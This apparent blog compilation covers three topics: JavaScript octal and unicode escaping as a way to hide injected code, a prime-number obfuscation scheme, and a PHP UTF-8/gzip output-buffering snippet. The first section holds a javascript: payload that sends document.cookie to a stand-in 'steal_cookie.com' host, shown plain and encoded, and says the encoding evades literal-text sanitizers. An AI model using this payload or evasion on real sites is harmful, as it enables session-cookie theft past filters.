JavaScript Character Encoding As Spoofing, Or Malicious Injections That Are 100% Executable, But Totally Unreadable

function string_to_octal(string){
  // [\s\S] also matches line breaks, which "." would skip.
  return string.replace(/[\s\S]/g, function(char){
    var code = char.charCodeAt(0);
    // octal escapes only cover code units below 256 (always padded to 3 digits); anything above falls back to \uXXXX.
    return 256 > code ? "\\" + ('00' + code.toString(8)).slice(-3) : string_to_unicode(char);
  });
}
function string_to_unicode(string){
  return string.replace(/[\s\S]/g, function(char){
    return "\\u" + ('0000' + char.charCodeAt(0).toString(16)).slice(-4);
  });
}
function unicode_to_string(string){
  // turns \uXXXX escape sequences back into the characters they stand for.
  return string.replace(/\\u([0-9a-fA-F]{4})/g, function(match, hex){
    return String.fromCharCode(parseInt(hex, 16));
  });
}

test it with the following payload:
javascript:(function(){var img = new Image(); img.src="https://steal_cookie.com?cookie=" + encodeURIComponent(document.cookie); return true;}());

the result is either “prefer octal over unicode” (string_to_octal, which works uniformly for most ASCII-based code): "\152\141\166\141\163\143\162\151\160\164\072\050\146\165\156\143\164\151\157\156\050\051\173\166\141\162\040\151\155\147\040\075\040\156\145\167\040\111\155\141\147\145\050\051\073\040\151\155\147\056\163\162\143\075\042\150\164\164\160\163\072\057\057\163\164\145\141\154\137\143\157\157\153\151\145\056\143\157\155\077\143\157\157\153\151\145\075\042\040\053\040\145\156\143\157\144\145\125\122\111\103\157\155\160\157\156\145\156\164\050\144\157\143\165\155\145\156\164\056\143\157\157\153\151\145\051\073\040\162\145\164\165\162\156\040\164\162\165\145\073\175\050\051\051\073"
or just “100% unicode encoding” (string_to_unicode): "\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0076\u0061\u0072\u0020\u0069\u006d\u0067\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0049\u006d\u0061\u0067\u0065\u0028\u0029\u003b\u0020\u0069\u006d\u0067\u002e\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0073\u0074\u0065\u0061\u006c\u005f\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0063\u006f\u006d\u003f\u0063\u006f\u006f\u006b\u0069\u0065\u003d\u0022\u0020\u002b\u0020\u0065\u006e\u0063\u006f\u0064\u0065\u0055\u0052\u0049\u0043\u006f\u006d\u0070\u006f\u006e\u0065\u006e\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003b\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u007d\u0028\u0029\u0029\u003b"

running either string has the same meaning as the original, and it never needs to be translated back: it is 100% executable code, just (naturally) a bit harder to read..
it also gets through sanitizing that looks for literal text, since the character encoding does not change the meaning of any character (only the spelling of the escaped string changes). one caveat: octal escapes are a syntax error in strict-mode code and in template literals, while \uXXXX escapes work everywhere.

the idea is that you do not need any conversion-matrix tables or encrypt/decrypt methods (or any intermediate step beyond just evaluating the string).
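
as a minimal sketch of that point (the helper name toUnicodeEscapes and the sample payload are made up for illustration, and JSON.parse stands in for the JavaScript parser, since it resolves \uXXXX escapes the same way a string literal does):

```javascript
// Hypothetical helper: encode every UTF-16 code unit as a \uXXXX escape,
// the same idea as string_to_unicode in the listing above.
function toUnicodeEscapes(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    out += "\\u" + text.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

const plain = 'alert("hi");';
const escaped = toUnicodeEscapes(plain);

// A naive filter that searches for literal text finds nothing in the escaped form.
const naiveFilterHit = escaped.includes("alert");

// No lookup table and no decrypt step: parsing the literal restores the text.
const decoded = JSON.parse('"' + escaped + '"');

console.log(naiveFilterHit, decoded === plain);
```

the escaped form contains none of the original keywords, yet parsing it yields exactly the original text, which is why a filter has to decode escapes before it matches anything.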

JavaScript Ninja Techniques – JavaScript Based Obfuscation 101 Using Conversion Matrix Unify With A Prime Number

JavaScript code obfuscation:
– is used for: “reasons”…
– provides some low-level protection against: straightforward debugging, and following (listening in on) the program flow.
– is required to: execute fast, limit ‘eval’ execution, stay DOM friendly

in plain terms, JavaScript code obfuscation is a reversible matrix conversion that still allows the DOM to “understand” the code, but makes debugging/watching it too exhausting for a human.

best practice also means minimal DOM evaluations: obfuscated code usually executes a few extra methods for the same plain input, so a good obfuscation algorithm adds as few evaluated phrases as possible and calls the ‘eval’ method only once.

here is a simple example that uses JavaScript to obfuscate plain JavaScript code (it can be anything, really…)

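var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

//toE is called below but was missing from the listing; this version is reconstructed from the output shown further down.
function toE(char){
  var n = chars.indexOf(char);
  if(-1 === n) n = char.charCodeAt(0) * 311; //not in the table: store charCode * 311
  return "fromE(" + n + "),";
}

function fromE(n){
  var char;

  //311 is a prime number larger than the table, so a multiple of it is never a table index (TODO: choose a larger prime for long UNICODE)
  if(n < chars.length) //checked first, otherwise index 0 ('a') would be read as 0 * 311
    char = chars.substr(n,1);
  else
    char = String.fromCharCode(n / 311);

  return char;
}

var phrase = 'console.log("hello")';
var obfuscated_phrase = "[" + phrase.replace(/[\s\S]/g,toE).replace(/\,$/,'') + "]";
var translated_plain_phrase = eval(obfuscated_phrase).join('');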


console.log("From: \n" + phrase + "\n\n" + "To: \n" + obfuscated_phrase + "\n\n" + "Back To: \n" + translated_plain_phrase + "\n");

it results in the following output in the console:

From: 
console.log("hello")

To: 
[fromE(2),fromE(14),fromE(13),fromE(18),fromE(14),fromE(11),fromE(4),fromE(14306),fromE(11),fromE(14),fromE(6),fromE(12440),fromE(10574),fromE(7),fromE(4),fromE(11),fromE(11),fromE(14),fromE(10574),fromE(12751)]

Back To: 
console.log("hello")
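
a variation on the listing above, as a rough sketch rather than the original method: the obfuscated form is kept as a plain array of numbers instead of a string of fromE(...) calls, so decoding needs no eval at all and the decoded code is evaluated exactly once. the names ALPHABET, PRIME, encode and decode are hypothetical; the table and the prime follow the listing.

```javascript
// Hypothetical names; the alphabet and the prime follow the listing above.
const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
const PRIME = 311;

// Table characters become their index; everything else becomes codePoint * PRIME.
// Assumption: the input contains no NUL character (0 * PRIME would collide with index 0).
function encode(source) {
  return Array.from(source, (ch) => {
    const index = ALPHABET.indexOf(ch);
    return index !== -1 ? index : ch.codePointAt(0) * PRIME;
  });
}

// Values below the table length are indexes; larger values are multiples of PRIME.
function decode(numbers) {
  return numbers
    .map((n) => (n < ALPHABET.length ? ALPHABET[n] : String.fromCodePoint(n / PRIME)))
    .join("");
}

const encoded = encode("1 + 2 * 3");
const restored = decode(encoded);

// The only evaluation step: run the restored expression once.
const result = new Function("return (" + restored + ");")();

console.log(encoded, restored, result);
```

keeping the payload as data also means a minifier sees only an array literal and two small functions, which leaves it little to "understand".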


piping the result of this simple obfuscation matrix into the Closure Compiler Service or UglifyJS may be interesting to witness. normally both Closure Compiler and UglifyJS try to “understand” the code by breaking it into trees, then transform those trees using the operations the tree-logic permits, resulting in smaller trees, then turn the trees back into plain code,
so… it will either increase or decrease the complexity of the code, using more or fewer transitions. as a rule of thumb, obfuscate your code using three or more chained calls: this results in a very deep and narrow tree, and UglifyJS or Google Closure Compiler will then “work for you”, minifying and obfuscating the end result even more, with minimal or no human intervention..


PHP Snippet – Proper UTF-8 And GZip With Buffers-Handling And Content-Length Header And Ratio Information

  1. first, set up the internal engine for UTF-8.

    mb_language("uni");
    mb_internal_encoding("UTF-8");
    mb_http_input("UTF-8"); //note: this function only reports the detected input encoding, it does not set one.
    mb_http_output("UTF-8");
    mb_regex_encoding("UTF-8");
    setlocale(LC_ALL, "he_IL.UTF-8");
    
    1. start the GZIP buffer.
    2. start the internal-engine buffer (now set for UTF-8).
    3. notice that implicit flush is turned off twice (once after each buffer); keep both calls.
    ob_start("ob_gzhandler");
    ob_implicit_flush(false);
    
    ob_start("mb_output_handler");
    ob_implicit_flush(false);
    
  2. use your PHP script as usual:
    echo content, print, print_r, var_dump, etc..

    for example:

    echo str_repeat("-=á黪ğřƳȪȭDZȌȢɸʌΈΣϣொᆕᶙṕℳℱⅧ⅜⇦∬⓲┲▶➂ⶴは㌵㠩דוזחטש", 3000);
    
  3. script end:
    we will close the buffers and flush them in reverse order (last opened, first closed).

    this also lets us collect data on the length of each layer's output!
    (I found it so interesting that I will actually write some extra headers with the information..)

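    1. (optionally) store the size of the raw output (the content of the innermost buffer, before mb_output_handler converts it).
    2. close and flush the mb_output_handler (UTF-8) buffer; its converted output lands in the ob_gzhandler buffer.
    3. (optionally) store the size of the UTF-8 output (the content of the ob_gzhandler buffer, before compression).
    4. close and flush the ob_gzhandler (GZIP) buffer; its compressed output lands in the outer buffer.
    5. (optionally) store the size of the GZIP output.
    $content_length__raw = ob_get_length(); //size of the raw output, before mb_output_handler runs.
    ob_end_flush(); //close the mb_output_handler buffer; its converted output is dumped into the gzip buffer.
    
    $content_length__utf8 = ob_get_length(); //size of the UTF-8 output, before compression.
    ob_end_flush(); //close the ob_gzhandler buffer; its compressed output is dumped into the outer buffer.
    
    //assumption: an outer buffer is still open here (output_buffering enabled in php.ini, or one more ob_start() before the two above); with no active buffer ob_get_length() returns false.
    $content_length__gzip = ob_get_length();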
    
  4. at this point the value of $content_length__gzip is the Content-Length header value, since it is the real output length (the final layer).

  5. write the Content-Length header.

    header('Content-Length: ' . $content_length__gzip);
    
  6. any additional headers should be written now.
    for example:

    header('Content-Type: text/html; charset=utf-8');
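
    to see why the last layer's size is the one that belongs in Content-Length, here is a small Node.js analog of the three measurements (not the PHP code above; the sample text and variable names are made up for illustration):

```javascript
const zlib = require("zlib");

// Repetitive multi-byte content, similar in spirit to the echo example above.
const body = "-=áğřדוזחטש".repeat(3000);

const charCount = body.length;                              // characters (UTF-16 code units), not bytes
const utf8Bytes = Buffer.byteLength(body, "utf8");          // bytes before compression
const gzipped = zlib.gzipSync(Buffer.from(body, "utf8"));   // the final layer
const gzipBytes = gzipped.length;                           // bytes actually sent: the Content-Length value

// Compression ratio of the final layer against the UTF-8 layer.
const ratio = ((gzipBytes / utf8Bytes) * 100).toFixed(2) + "%";

console.log({ charCount, utf8Bytes, gzipBytes, ratio });
```

    the three numbers differ, and only the last one describes the bytes that go over the wire.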
    

  • the easiest way is to wrap it all in a few functions..
    here is a complete example that writes some additional interesting information as headers (why headers? well, naturally, altering the body of the response would change the measurements.. so headers are the best way..)
  • the result will look like so:

    (screenshots: 2014-08-02_181624, 2014-08-02_181757)